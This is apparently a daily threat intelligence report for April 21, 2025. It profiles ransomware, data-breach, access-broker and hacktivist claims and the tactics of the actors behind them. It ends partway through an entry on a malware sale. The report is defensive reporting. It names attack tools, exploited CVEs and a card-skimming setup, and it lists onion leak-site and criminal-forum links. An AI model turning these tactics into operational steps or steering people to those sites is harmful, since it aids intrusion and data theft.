[April-21-2025] Daily Cybersecurity Threat Report

Posted on

1. Introduction

This report provides a detailed analysis of significant cybersecurity incidents reported within the last 24 hours, focusing on threat actor activities, tactics, techniques, and procedures (TTPs), and potential impact. The information is derived from publicly available data and threat intelligence sources as of April 21, 2025. Analysis includes context on the threat actors involved, drawing upon external research to provide a comprehensive understanding of the evolving threat landscape.

2. Executive Summary

Overview: The past 24 hours witnessed a high volume of diverse cyber threat activity, dominated by Ransomware-as-a-Service (RaaS) operations employing double extortion tactics. Prominent actors included Qilin, Hunters International, LockBit 3.0, and Sarcoma, targeting organizations across North America, Europe, and Asia. Data breaches impacting various sectors (IT, Aviation, Finance, Consumer Electronics) were also prevalent, alongside initial access brokers offering pathways into corporate networks and hacktivist groups conducting defacements and disruptive attacks.

Key Trends: A continued reliance on RaaS models was observed, alongside the exploitation of known vulnerabilities and remote access services for initial entry. Data exfiltration remains a primary objective, underpinning double or triple extortion strategies. Newer ransomware groups like Sarcoma and NightSpire demonstrated continued activity, contributing to the dynamic threat landscape. Hacktivist activity, particularly from groups such as Anonymous Italia and Cyber ​​shade unit, indicates ongoing geopolitical motivations influencing cyber operations.

Significant Incidents: Notable incidents include Qilin targeting financial services in Canada and real estate in the US, Hunters International hitting healthcare in Belgium, LockBit 3.0 impacting wholesale in Italy, Sarcoma targeting civil engineering in Brazil, and alleged major data breaches at DJI (Consumer Electronics, China) and EmiratesNBD (Banking, UAE). The sale of sophisticated malware designed for evasion and access brokering for corporate networks further highlights the active cybercriminal underground supporting these operations.

Table: Daily Incident Summary (April 21, 2025)

Victim OrganizationVictim IndustryVictim CountryThreat Actor(s)Incident Category
Dominion Lending Centres – The Mortgage SourceFinancial ServicesCanadaQilinRansomware
Unspecified Corporate EntitiesN/AJapan, EU, USAb1gb0y75Initial Access
Finkel TechnologiesInformation Technology (IT) ServicesIsraelVortexData Breach
IndiGoAirlines & AviationIndiaMachine1337Data Breach
Sinalisa Segurança Viária Ltda.Civil EngineeringBrazilSarcomaRansomware
Pharma ForceHealthcare & PharmaceuticalsBelgiumHUNTERS INTERNATIONALRansomware
DJIConsumer ElectronicsChinaR00TK1T ISC CYBER TEAMData Breach
Tutto Ufficio s.r.l.WholesaleItalyLOCKBIT 3.0Ransomware
BrandwaveMarketing, Advertising & SalesUAECyber ​​shade unitData Breach
Specialized School No. 155EducationUkraineCyber ​​shade unitData Breach
Proficient Industries (India) Pvt. Ltd.Manufacturing & Industrial ProductsIndiaCyber ​​shade unitData Breach
Unspecified French PrestaShop SiteE-commerce & Online StoresFranceClawsonInitial Access
body-feeling.ruHealth & FitnessRussiaAnonymous ItaliaDefacement
N/A (Malware Sale)N/AN/ABaldwinMalware
EmiratesNBDBanking & MortgageUAEMachine1337Data Breach
Equipment Rental PlatformBusiness Supplies & EquipmentBrazilVortexData Breach
biteyko.ruSoftware DevelopmentRussiaAnonymous ItaliaDefacement
Municipality of ArdonGovernment AdministrationFranceNightSpireRansomware
Michelson Realty Company LLCReal EstateUSAQilinRansomware
Fujita Health UniversityHospital & Health CareJapanl33tfgData Breach
bestalp.ruBuilding and constructionRussiaAnonymous ItaliaDefacement
N/A (Tool Sale)N/AN/ACloudByteMalware

3. Detailed Incident Analysis

(The following section details each incident reported in the provided data.)

Incident 1: Dominion Lending Centres – The Mortgage Source falls victim to Qilin Ransomware

  • Victim: Dominion Lending Centres – The Mortgage Source (Financial Services, Canada) – dlcthemortgagesource.ca
  • Details: Claimed on 2025-04-21T13:45:54Z. Category: Ransomware. Network: Tor. The Qilin ransomware group claims to have exfiltrated data from this Canadian mortgage company, posting sample screenshots on their Tor-based leak site as proof of compromise.
  • Threat Actor Profile: Qilin (aka Agenda)
  • Background: Qilin emerged in July 2022, operating a Ransomware-as-a-Service (RaaS) platform.1 The group is assessed to have Russian origins and has been actively recruiting affiliates, though reportedly excluding those operating within Commonwealth of Independent States (CIS) countries.3 Qilin gained significant notoriety for attacks demanding substantial ransoms, such as the $50 million demand made against Synnovis, a UK pathology provider supporting NHS hospitals.2 As a RaaS operation, Qilin provides its customizable ransomware (available in both Go and the increasingly popular Rust programming language) and infrastructure to affiliates, typically taking a 15-20% share of any ransom payments collected.4 The use of Rust suggests an effort to create more performant and potentially evasive malware compared to older Go-based variants.2
  • TTPs: Qilin employs a double extortion strategy, involving both the encryption of victim data and the exfiltration of sensitive files, threatening public release if the ransom is not paid.1 Initial access is often gained through phishing emails 1 or by exploiting vulnerabilities in external remote services, such as Fortinet SSL VPN flaws 2, and public-facing applications, like CVE-2023-27532 in Veeam Backup & Replication software.2 Affiliates are known to use valid credentials obtained via leaks or purchase 5, employ process injection for privilege escalation and evasion 5, create scheduled tasks for persistence 5, and utilize common offensive tools like Remote Monitoring and Management (RMM) software and Cobalt Strike beacons for command and control and deployment.4 Lateral movement within compromised networks is achieved using tools like PsExec or leveraging SSH.2 Privilege escalation may involve tools like Mimikatz.2 To hinder recovery, Qilin operators delete logs and backups, including Volume Shadow Copies.1 Encryption typically uses AES, ChaCha20, and RSA algorithms.2 The ransomware payload offers customization options, allowing affiliates to tailor aspects like encryption modes and targeted processes/services.1
  • Targets & Motivations: The primary motivation for Qilin is financial gain.2 The group targets organizations globally and opportunistically across a wide range of sectors, including financial services, healthcare, manufacturing, education, and critical infrastructure.1 This attack against a Canadian financial services company aligns perfectly with their established pattern of targeting organizations perceived as capable of paying significant ransoms.3
  • Evidence:
  • Published URL: http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=75808897-ee44-3c46-ae03-fa31f1968d33
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/256dd93b-b491-431c-a4e2-00bd9dbbe412.png

Incident 2: Alleged sale of SMTP access

  • Victim: Unspecified corporate entities (Japan, EU, USA)
  • Details: Claimed on 2025-04-21T13:17:08Z. Category: Initial Access. Network: Openweb (xss.is forum). The threat actor, identified as “b1gb0y75”, is advertising the sale of Simple Mail Transfer Protocol (SMTP) access for corporate entities located in Japan, the European Union, and the United States on the xss.is cybercrime forum.
  • Threat Actor Profile: b1gb0y75
  • Background: The username “b1gb0y75” appears on xss.is, a known forum for cybercriminal activities. This individual likely operates as an Initial Access Broker (IAB), specializing in compromising and selling access to corporate resources. Their motivation is purely financial, providing the means for other threat actors to conduct subsequent attacks such as phishing, malware distribution, or Business Email Compromise (BEC). Specific details about this actor beyond their forum activity are not available from the provided research.
  • TTPs: The actor focuses on compromising mail servers or individual corporate email accounts to gain control over SMTP functionalities. This could be achieved through various methods, including credential stuffing attacks using breached passwords, targeted phishing campaigns against employees, exploitation of vulnerabilities in mail server software (e.g., Exchange Server, Postfix), or compromising third-party services that have delegated permissions to send emails on behalf of the corporation. The sale of this access occurs within the structured environment of underground forums.
  • Targets & Motivations: The motivation is financial gain through the sale of access. Targets are opportunistic; any corporate SMTP access that can be verified and sold holds value. The offering of access spanning multiple developed regions (Japan, EU, USA) suggests either broad, non-targeted scanning and exploitation efforts or access obtained through multiple unrelated compromises.
  • Evidence:
  • Published URL: https://xss.is/threads/136497/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/d6176e26-878f-4382-b874-db630a9bfb17.png

Incident 3: Alleged data breach of Finkel Technologies

  • Victim: Finkel Technologies (Information Technology (IT) Services, Israel) – finkeltech.co.il
  • Details: Claimed on 2025-04-21T13:14:46Z. Category: Data Breach. Network: Telegram. A group calling itself “Vortex” has claimed responsibility for breaching the database of Finkel Technologies, an Israeli IT services company. The compromised data reportedly includes highly sensitive configuration and credential information: database usernames and passwords, JWT secret keys, application keys, Redis configuration details, mail server settings and credentials, AWS access credentials, and Pusher service keys.
  • Threat Actor Profile: Vortex
  • Background: Vortex appears to be a data breach and extortion group communicating and publishing claims via the Telegram messaging platform. The name “Vortex” is generic, and available research discussing cybersecurity concepts like the “vulnerability vortex” 6 or security products/companies named Vortex 9 does not provide specific intelligence on this threat actor group. Based on their actions, Vortex likely focuses on exploiting system weaknesses to steal sensitive data, which can then be used for extortion or sold on underground markets. Their motivations appear primarily financial.
  • TTPs: The TTPs likely involve exploiting vulnerabilities in web applications (e.g., SQL injection allowing database access, path traversal exposing configuration files) or misconfigured cloud infrastructure (e.g., publicly accessible AWS S3 buckets containing credentials, insecure API endpoints). Accessing and exfiltrating critical configuration files, environment variable stores, or directly dumping database contents containing secrets are key actions. Communication of the breach and potential data release occurs via their Telegram channel.
  • Targets & Motivations: The group is likely financially motivated, seeking to profit from the stolen data either through direct extortion of the victim or sale to other malicious actors. Targeting an IT services company in Israel could be opportunistic, driven by the discovery of a vulnerability, or potentially influenced by geopolitical factors, although there is no direct evidence for the latter. The specific data types claimed (AWS keys, database credentials, API keys) are extremely valuable as they can enable deeper network compromise, further attacks, or complete system takeover. The compromise of such foundational infrastructure credentials represents a severe security failure. This type of breach moves beyond typical PII theft and grants attackers the potential to manipulate the victim’s core operations and potentially impact their clients, highlighting critical risks in application security and secrets management.
  • Evidence:
  • Published URL: https://t.me/Vvorttexx/27
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/92b54f25-f896-445e-9a08-fd0acb9fdd8d.png

Incident 4: Alleged sale of IndiGo flight ticket data

  • Victim: IndiGo (Airlines & Aviation, India) – goindigo.in
  • Details: Claimed on 2025-04-21T13:07:20Z. Category: Data Breach. Network: Openweb (xss.is forum). The threat actor “Machine1337” is advertising the sale of data allegedly obtained from IndiGo, a major Indian airline. The data is claimed to include fields such as CountryName, Message, DestinationPhone, and DeliveryTime, seemingly related to flight ticket notifications or delivery confirmations.
  • Threat Actor Profile: Machine1337
  • Background: This actor is active on the xss.is cybercrime forum and was also observed claiming a breach against EmiratesNBD bank (see Incident 15). A GitHub profile associated with the username “machine1337” indicates an interest in bug bounty hunting.13 This background could suggest the actor possesses technical skills for vulnerability discovery, potentially now applying them for malicious financial gain. Their motivation appears to be financial, focusing on stealing and selling data. General research on threat actor profiling 14 or AI threats 18 did not yield specific information on Machine1337.
  • TTPs: The actor likely exploited vulnerabilities within IndiGo’s web applications, APIs (potentially related to booking confirmation or messaging systems), or associated databases. Methods could include SQL injection, API abuse, or exploiting misconfigurations. After exfiltrating the data, they are offering it for sale on an underground forum.
  • Targets & Motivations: Primarily financially motivated. The targeting appears opportunistic, focusing on large organizations (like IndiGo and EmiratesNBD) that possess customer data which can be monetized. The specific nature of the claimed data (CountryName, Message, DestinationPhone, DeliveryTime) might suggest access to a specific system, perhaps related to customer communications or SMS gateways, rather than the core passenger reservation system. The dual targeting of entities in India and the UAE might indicate a regional focus or simply reflect where vulnerabilities were found.
  • Evidence:
  • Published URL: https://xss.is/threads/136495/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/c29e5a3f-2803-4a91-bdb5-e8fb598ad901.png

Incident 5: Sinalisa Segurança Viária Ltda. falls victim to Sarcoma Ransomware

  • Victim: Sinalisa Segurança Viária Ltda. (Civil Engineering, Brazil) – sinalisa.com.br
  • Details: Claimed on 2025-04-21T12:48:04Z. Category: Ransomware. Network: Tor. The Sarcoma ransomware group claims to have compromised this Brazilian civil engineering company, stating they have exfiltrated 43 GB of data. They have threatened to publish this data within 6 to 7 days if their demands are not met.
  • Threat Actor Profile: Sarcoma
  • Background: Sarcoma is a relatively new ransomware group that emerged in late 2023 or October 2024.19 Despite its recent appearance, it quickly established itself as a significant threat, reportedly compromising dozens of organizations within its first month of operation.19 The group employs a double extortion model, involving both data encryption and data exfiltration.20 Its precise origins and affiliations remain unclear.21 The rapid rise of Sarcoma mirrors a trend where new RaaS groups quickly scale operations, possibly by leveraging leaked source code from other ransomware families or by forming partnerships within the cybercrime ecosystem.19
  • TTPs: Sarcoma utilizes a double extortion approach, encrypting victim systems while also stealing sensitive data to increase leverage for ransom demands.20 Initial access vectors reportedly include phishing emails, the exploitation of n-day vulnerabilities (previously disclosed but potentially unpatched flaws), and possibly supply chain intrusions.21 Once access is gained, they may use Remote Monitoring and Management (RMM) tools for network discovery, employ defense evasion techniques, steal credentials, and exfiltrate data.23 Exfiltration volumes can be significant (e.g., 40GB claimed in another attack 23, 43GB here). Like many modern RaaS operations, they likely target Windows, Linux, and VMWare ESXi environments 22 and may utilize cloud storage platforms for data exfiltration.22 Specific vulnerabilities potentially exploited by groups like Sarcoma include flaws in VPNs/firewalls (e.g., SonicWall CVE-2024-53704, FortiOS CVE-2024-4059) or even zero-day vulnerabilities.23
  • Targets & Motivations: The group’s primary motivation is financial gain. Sarcoma appears to target organizations opportunistically across various sectors, including manufacturing, healthcare, finance, IT services, agri-food, and, as seen in this case, civil engineering.20 Their victims have been observed across North America, Asia, and Europe.22 The attack on a Brazilian civil engineering firm fits this opportunistic targeting profile. The short deadline threatened (6-7 days) is a common psychological pressure tactic used by ransomware groups.
  • Evidence:
  • Published URL: http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/c58f5a55-a9ad-468e-8796-cd026b1ac79b.png

Incident 6: Pharma Force falls victim to HUNTERS INTERNATIONAL Ransomware

  • Victim: Pharma Force (Healthcare & Pharmaceuticals, Belgium) – pharmaforce.be
  • Details: Claimed on 2025-04-21T12:32:15Z. Category: Ransomware. Network: Tor. The Hunters International ransomware group has listed Pharma Force, a Belgian healthcare/pharmaceuticals company, on its leak site, claiming to have exfiltrated a substantial 645.7 GB of data.
  • Threat Actor Profile: HUNTERS INTERNATIONAL
  • Background: Hunters International emerged in October 2023 26 and operates a RaaS model, likely with an 80/20 affiliate revenue split.26 Significant code similarities (over 60%) exist between Hunters International’s Rust-based ransomware and that of the defunct Hive ransomware group.26 While the group claims they purchased Hive’s source code rather than being a direct rebrand 26, the connection is strong, and underground forums sometimes refer to them using Hive’s name.28 A key characteristic is their strong focus on data exfiltration, sometimes choosing not to encrypt victim systems at all and relying solely on the threat of leaking stolen data for extortion.26 They utilize custom tools, including “Storage Software” for managing exfiltrated data metadata 28 and the “SharpRhino” backdoor, which masquerades as a legitimate tool.26 There were indications the group might rebrand to “World Leaks” in January 2025, shifting entirely to data extortion.28
  • TTPs: Hunters International employs double extortion tactics.26 Initial access is achieved through various means, including exploiting known vulnerabilities (e.g., Oracle WebLogic flaws 27, Citrix Bleed CVE-2023-4966 31, vulnerabilities in Fortinet 19, SonicWall 31, and Microsoft Exchange servers 31), compromising RDP or VPN services 19, and phishing campaigns.31 Their ransomware is written in Rust 26, uses ChaCha20-poly1305 and RSA encryption 26, and typically appends .LOCKED or .lock extensions to encrypted files.26 However, newer versions (v6+) may forgo file renaming and ransom notes entirely.28 Lateral movement involves tools like PsExec 19, RDP 19, Plink, Impacket, and RMM tools like AnyDesk and TeamViewer.27 They perform credential dumping using Mimikatz 19 or by extracting SAM and SYSTEM registry hives.32 Other tools observed include AutoIt malware 27 and the China Chopper web shell.32 They actively disable backup and recovery mechanisms.26 Data exfiltration often targets cloud storage services like MEGA.27 The group also utilizes an OSINT service to gather information on victims for enhanced extortion pressure.28 Their malware targets Windows, Linux, and ESXi platforms.26
  • Targets & Motivations: The group is financially motivated. They target organizations opportunistically across a wide spectrum of industries, including healthcare, manufacturing, finance, education, real estate, and energy.26 Their operations have a global reach, with a significant number of victims in the United States and Europe.26 They have stated prohibitions against attacking CIS countries and potentially Israel and Turkey.28 Targeting a healthcare organization in Belgium aligns with their known operational patterns and industry focus.28 The substantial volume of data claimed (645.7 GB) underscores their emphasis on data theft as a primary extortion lever. The potential evolution from Hive and the shift towards data-centric extortion signal the group’s adaptability, possibly driven by improved defenses against encryption or law enforcement focus on traditional ransomware infrastructure.
  • Evidence:
  • Published URL: https://hunters55rdxciehoqzwv7vgyv6nt37tbwax2reroyzxhou7my5ejyid.onion/companies/5073381248
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/b9cacbbd-a72e-45ef-a677-13343d282ba8.png

Incident 7: Alleged data breach of DJI

  • Victim: DJI (Consumer Electronics, China) – dji.com
  • Details: Claimed on 2025-04-21T12:07:42Z. Category: Data Breach. Network: Telegram. The group “R00TK1T ISC CYBER TEAM” claims to have breached and gained unauthorized access to DJI, a leading global drone manufacturer. They allege the exfiltration of a wide range of customer and order data, including names, order IDs, dates/times, tracking numbers, pricing, drone specifications, contact information, shipping details, and payment methods.
  • Threat Actor Profile: R00TK1T ISC CYBER TEAM
  • Background: This appears to be a hacktivist or cybercrime group operating via Telegram, with claims also reportedly appearing on dark web portals.33 The name “R00TK1T” suggests an intent to project technical hacking capabilities. Their motivation for targeting DJI is currently unclear and could range from political (targeting a prominent Chinese technology company), financial (selling the valuable customer and potentially sensitive technical data), industrial espionage, or simply seeking notoriety by attacking a high-profile target.
  • TTPs: The claimed access and data exfiltration suggest methods beyond simple website attacks. Likely TTPs include exploiting vulnerabilities in DJI’s e-commerce platform, customer portals, supply chain systems, or associated APIs. Techniques such as SQL injection, cross-site scripting (XSS) leading to credential theft, exploiting API security flaws, or compromising administrative accounts could have been used. Data exfiltration would focus on accessing and copying customer databases, order management systems, and potentially payment processing information. Communication and claims are made via Telegram and potentially dark web forums.
  • Targets & Motivations: Targeting DJI, a global leader in drone technology headquartered in China, is significant. Motivations could be multi-faceted:
  • Hacktivism: A politically motivated attack against a major Chinese corporation, possibly related to geopolitical tensions or specific issues concerning drone usage or data privacy.
  • Financial: The stolen data (customer PII, order details, potentially payment info) is highly valuable on underground markets.
  • Industrial Espionage: Accessing drone specifications or other proprietary technical data could be a goal.
  • Notoriety: Successfully breaching a well-known technology company brings attention to the group. A breach impacting a company like DJI, especially involving sensitive customer data and potentially payment information, carries substantial risks, including financial losses, regulatory penalties, and severe reputational damage. The potential geopolitical dimension adds further complexity.
  • Evidence:
  • Published URL: https://t.me/R00TK1TOFF/823
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/d6dcebf9-3777-4ecf-9b73-8203d6e3247a.png, https://d34iuop8pidsy8.cloudfront.net/1daf1a85-5428-4fe7-8e7f-1ad6a2847f6a.png

Incident 8: Tutto Ufficio s.r.l. falls victim to LockBit Ransomware

  • Victim: Tutto Ufficio s.r.l. (Wholesale, Italy) – tuttoperlufficio.eu
  • Details: Claimed on 2025-04-21T11:21:01Z. Category: Ransomware. Network: Tor. The LockBit 3.0 ransomware operation claims to have compromised Tutto Ufficio s.r.l., an Italian wholesale company. The claim includes data exfiltration, with a threat to publish the stolen data within 13-14 days if the ransom is not paid.
  • Threat Actor Profile: LOCKBIT 3.0 (aka LockBit Black)
  • Background: LockBit has been one of the most prolific and dominant RaaS operations globally since its emergence in 2019.34 The LockBit 3.0 variant, also known as LockBit Black, appeared in June 2022.36 The group was known for the speed and stability of its ransomware, extensive customization options for affiliates, and a business-like approach.39 In February 2024, a major international law enforcement action, Operation Cronos, significantly disrupted LockBit’s infrastructure, seized servers and cryptocurrency accounts, led to affiliate arrests, and publicly identified the alleged leader, Dmitry Khoroshev.35 Despite this disruption, LockBit-branded attacks continue. This persistence is attributed to the decentralized nature of RaaS, the likely continued operation of independent affiliates, and the public leak of the LockBit 3.0 builder in September 2022, which allows other actors to create and deploy the ransomware.34
  • TTPs: LockBit operates as a RaaS platform 34, typically employing double or triple extortion (encryption, data exfiltration, potential data sale/auction).37 Affiliates gain initial access through various vectors, including RDP exploitation 37, phishing campaigns 43, exploiting vulnerabilities in public-facing applications (e.g., Fortinet CVE-2018-13379, F5 BIG-IP CVE-2021-22986, Fortra GoAnywhere CVE-2023-0669, PaperCut CVE-2023-27350) 34, drive-by compromises 44, and the use of previously compromised valid accounts.44 Post-access, common tools include Cobalt Strike, Metasploit, and Mimikatz for C2, exploitation, and credential theft 37, along with PowerShell Empire and PsExec for execution and lateral movement.34 LockBit 3.0 ransomware features anti-analysis capabilities, such as requiring a specific password for execution 36, and often checks the system language to avoid encrypting systems in CIS countries.36 It employs obfuscation techniques 36, deletes Volume Shadow Copies and event logs to hinder recovery and investigation 34, and terminates specific processes and services.36 Encryption uses a combination of AES and RSA algorithms.34 The ransomware has variants targeting Windows, Linux, VMWare ESXi, and even MacOS 34, and possesses worm-like self-propagation capabilities.37 A LockBit 4.0 variant was reportedly under development following the takedown.43
  • Targets & Motivations: LockBit’s primary motivation is financial gain.37 Historically, the group and its affiliates have targeted organizations globally across virtually all sectors, including critical infrastructure, manufacturing, finance, healthcare, and government.35 They have hit both small-to-medium businesses (SMBs) and large enterprises.43 This attack on an Italian wholesale company is consistent with their broad, opportunistic targeting strategy. The continued appearance of LockBit 3.0 attacks post-takedown underscores the challenge of dismantling decentralized cybercrime operations. While the core group’s operational capacity is likely diminished, the availability of the leaked builder means the malware itself remains a threat, wielded by potentially independent actors or other groups. Defenses must remain focused on the known TTPs associated with the malware, irrespective of the current status of the original leadership.
  • Evidence:
  • Published URL: http://lockbit7ouvrsdgtojeoj5hvu6bljqtghitekwpdy3b6y62ixtsu5jqd.onion/post/yocIn5yrx5m8bunl6806172ae7cb2
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/ea76f1bf-667e-439d-bc6a-182d1f2e6aa6.png

Incidents 9, 10, 11: Cyber ​​shade unit targets Brandwave, Specialized School No. 155, Proficient Industries (India) Pvt. Ltd.

  • Victims:
  • Brandwave (Marketing, Advertising & Sales, UAE) – brandwave.ae
  • Specialized School No. 155 (Education, Ukraine) – sch-155.com.ua
  • Proficient Industries (India) Pvt. Ltd. (Manufacturing & Industrial Products, India) – proficientindustries.in
  • Details: Claimed consecutively around 2025-04-21T07:22Z. Category: Data Breach. Network: Telegram. The group “Cyber ​​shade unit” posted claims on the same Telegram channel (“hadow_Hunter”) alleging successful attacks against these three diverse organizations. For each victim, the group claims to have taken control over their infrastructure, gained full access to internal systems, extracted sensitive databases and files, and temporarily disabled some services during the intrusion.
  • Threat Actor Profile: Cyber ​​shade unit
  • Background: This appears to be a previously unknown or low-profile group operating via Telegram channels associated with hacking activities. The name “Cyber ​​shade unit” implies a focus on disruptive or potentially covert cyber operations. The coordinated claims against three distinct targets in different countries (UAE, Ukraine, India) and sectors within a very short timeframe suggest either a targeted campaign or a spree of opportunistic attacks. Their motivations are unclear but could include hacktivism (political or social protest), disruption for notoriety, or potentially financial gain if the stolen data is intended for sale or extortion, although the claims focus more on control and disruption.
  • TTPs: The group’s claims of achieving “full access to internal systems,” extracting “sensitive databases and files,” and “temporarily disabling services” suggest TTPs beyond simple website defacement or DDoS attacks commonly associated with lower-tier hacktivism. If accurate, their methods likely involve exploiting significant vulnerabilities in web applications, servers, or network infrastructure, potentially using stolen credentials, or exploiting misconfigurations to gain deep network access. Data exfiltration and disruptive actions (disabling services) are explicitly claimed. Communication and boasting occur via Telegram.
  • Targets & Motivations: The wide diversity of targets (Marketing in UAE, Education in Ukraine, Manufacturing in India) makes deducing a clear motivation difficult without further information about the group. Targeting a school in Ukraine could suggest a pro-Russian alignment, common among many hacktivist groups active since 2022.45 However, the targeting of entities in the UAE and India does not neatly fit this narrative. The motivation could be complex geopolitical maneuvering, anti-establishment sentiment directed at diverse targets, purely opportunistic attacks based on vulnerability scanning, or potentially exaggerated claims made to gain credibility or attention within the hacktivist community. The emphasis on control and disruption leans more towards hacktivism than straightforward financial crime. The simultaneous nature of these claims against disparate victims is unusual and warrants further monitoring to ascertain the group’s true capabilities, affiliations, and objectives. The claim of deep system access, if verified, would indicate a more sophisticated actor than typical defacement groups.
  • Evidence:
  • Published URL: https://t.me/hadow_Hunter/1640 (Same URL applies to all three incidents)
  • Screenshots:
  • Brandwave: https://d34iuop8pidsy8.cloudfront.net/66c98137-c46f-42c2-8cb6-b20bce3cf16f.png, https://d34iuop8pidsy8.cloudfront.net/b7444001-1223-4cef-a865-8aef94731169.png
  • School 155: https://d34iuop8pidsy8.cloudfront.net/2df7d832-6435-423c-bfa4-a76b799e1f18.png, https://d34iuop8pidsy8.cloudfront.net/e2705825-ed30-4467-9f61-b8cb5226d873.png
  • Proficient Industries: https://d34iuop8pidsy8.cloudfront.net/b40dd782-0a5d-4207-bbac-e8f6fad79d15.png, https://d34iuop8pidsy8.cloudfront.net/475fe35f-26ec-4aca-87e7-bef71ac23278.png

Incident 12: Alleged sale of access to compromised French PrestaShop site

  • Victim: Unspecified PrestaShop e-commerce site (E-commerce & Online Stores, France)
  • Details: Claimed on 2025-04-21T06:38:41Z. Category: Initial Access. Network: Openweb (exploit.in forum). The threat actor “Clawson” is offering for sale access to a compromised e-commerce website based in France. The site reportedly uses the PrestaShop platform and receives over 175,000 monthly visits. The offered access includes a web shell with capabilities to modify PHP and JavaScript files, although the seller notes some potential issues with PHP execution, possibly due to caching or plugin conflicts. Crucially, the actor claims that malicious card redirects implemented on the shop generate approximately 950 stolen credit cards per month.
  • Threat Actor Profile: Clawson
  • Background: “Clawson” is active on exploit.in, a prominent Russian-speaking underground forum often used for trading illicit goods and services. This actor appears to operate as an Initial Access Broker (IAB) with a specialization in compromising e-commerce websites. Their motivation is financial gain through the sale of access and potentially the proceeds from the active card skimming operation. Available research snippets related to “Clawson” or PrestaShop compromises were either irrelevant spam/filler content 47 or general discussions of e-commerce security issues.52
  • TTPs: The actor likely gains access by exploiting vulnerabilities specific to the PrestaShop platform itself or, more commonly, vulnerabilities within third-party modules or plugins installed on the target site. Once server access is achieved, they install a web shell (a script allowing remote command execution via a web browser) to maintain control and facilitate file modification. They have implemented malicious scripts, likely JavaScript injected into the site’s frontend, to intercept or redirect customer payment card details during the checkout process (a technique known as web skimming or Magecart-style attacks). The final step involves advertising and selling this compromised access, including the active carding operation, on cybercrime forums.
  • Targets & Motivations: The motivation is strictly financial. Targets are e-commerce websites, particularly those built on popular platforms like PrestaShop, which have a large user base and potentially numerous vulnerable plugins. High-traffic sites (like the one claimed with 175K+ monthly visits) are particularly attractive as they offer a larger pool of potential victims for card theft. The focus on a French site might indicate a regional preference, access obtained via specific localized campaigns, or simply an opportunistic find. The sale includes not just access but an ongoing, profitable card skimming operation (generating ~950 cards/month), making it significantly more valuable to potential buyers seeking immediate illicit revenue streams. The mention of PHP execution issues might suggest the skimming is primarily client-side (JavaScript) or that server-side defenses are partially effective, limiting full backend control but not stopping the card theft.
  • Evidence:
  • Published URL: https://forum.exploit.in/topic/257780/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/99fef434-51e5-4d18-a9b2-8614aacb0259.png

Incidents 13, 17, 21: Anonymous Italia targets body-feeling.ru, biteyko.ru, bestalp.ru

  • Victims:
  • body-feeling.ru (Health & Fitness, Russia)
  • biteyko.ru (Software Development, Russia)
  • bestalp.ru (Building and construction, Russia)
  • Details: Claimed between 2025-04-21T00:22Z and 2025-04-21T05:39Z. Category: Defacement. Network: Telegram. The hacktivist group “Anonymous Italia” claimed responsibility for defacing the websites of these three Russian businesses via posts on their Telegram operations channel.
  • Threat Actor Profile: Anonymous Italia
  • Background: Anonymous Italia is identified as a regional faction or collective operating under the umbrella of the global Anonymous movement.46 The broader Anonymous collective is a decentralized, international hacktivist group active since approximately 2003, known for cyberattacks targeting governments, corporations, and other organizations to protest censorship, perceived injustices, or specific political events.53 Anonymous Italia specifically has been documented as being active in conducting cyber operations, primarily DDoS attacks and defacements, against Russian entities following the full-scale invasion of Ukraine in 2022, aligning with the wider Anonymous collective’s anti-invasion stance.45
  • TTPs: The primary TTPs associated with Anonymous Italia and similar hacktivist groups include Distributed Denial-of-Service (DDoS) attacks aimed at overwhelming target websites or services, and website defacements, which involve altering a website’s content to display the group’s message or propaganda.45 Defacements are often achieved by exploiting common web vulnerabilities such as SQL injection, cross-site scripting (XSS), or exploiting known flaws in Content Management Systems (CMS) or web server software. They heavily utilize platforms like Telegram for coordination, recruitment, and publicizing their attacks.45
  • Targets & Motivations: The group’s actions are driven by political motivations, specifically hacktivism. Their attacks against Russian websites serve as a form of digital protest against the ongoing war in Ukraine.45 Targets are often chosen opportunistically or symbolically to maximize visibility and express dissent against the Russian state or perceived supporters.57 The targeting of seemingly random Russian commercial websites (in sectors like health/fitness, software development, and construction) reinforces the idea that the protest is directed broadly against Russia, rather than being focused on specific military or government entities. This activity demonstrates the continued use of relatively low-sophistication cyberattacks as a tool for geopolitical protest by decentralized groups. While often causing only temporary disruption or reputational damage, these actions contribute to the overall cyber conflict landscape. The existence of distinct regional cells like Anonymous Italia highlights how localized groups can participate in global hacktivist campaigns.45
  • Evidence:
  • body-feeling.ru:
  • Published URL: https://t.me/AnonSecIta_Ops/726
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/cd7123f6-9abd-43e2-908d-88807171659d.png
  • biteyko.ru:
  • Published URL: https://t.me/AnonSecIta_Ops/722
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/e785d693-c3f8-4956-b401-dab7b06adbc7.png
  • bestalp.ru:
  • Published URL: https://t.me/AnonSecIta_Ops/718
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/bfbae3bd-a70e-4a16-b499-730831fa2fea.png

Incident 14: Alleged Sale of Baldwin Killer

  • Victim: N/A (Malware Sale)
  • Details: Claimed on 2025-04-21T04:38:44Z. Category: Malware. Network: Openweb (xss.is forum). An actor using the handle “Baldwin” is advertising a malware tool named “Baldwin Killer” for sale on the xss.is forum. The tool is marketed with advanced capabilities designed to bypass endpoint security solutions and maintain stealth on compromised Windows systems. Claimed features include bypassing major antivirus (AV) and Endpoint Detection and Response (EDR) products (Windows Defender, Kaspersky, Bitdefender, Avast mentioned), memory injection techniques, User Account Control (UAC) bypass using a custom “undetectable” method, a Ring0 rootkit for deep system stealth, auto-startup functionality triggered at early boot stages, and SmartScreen bypass via DLL sideloading.
  • Threat Actor Profile: Baldwin
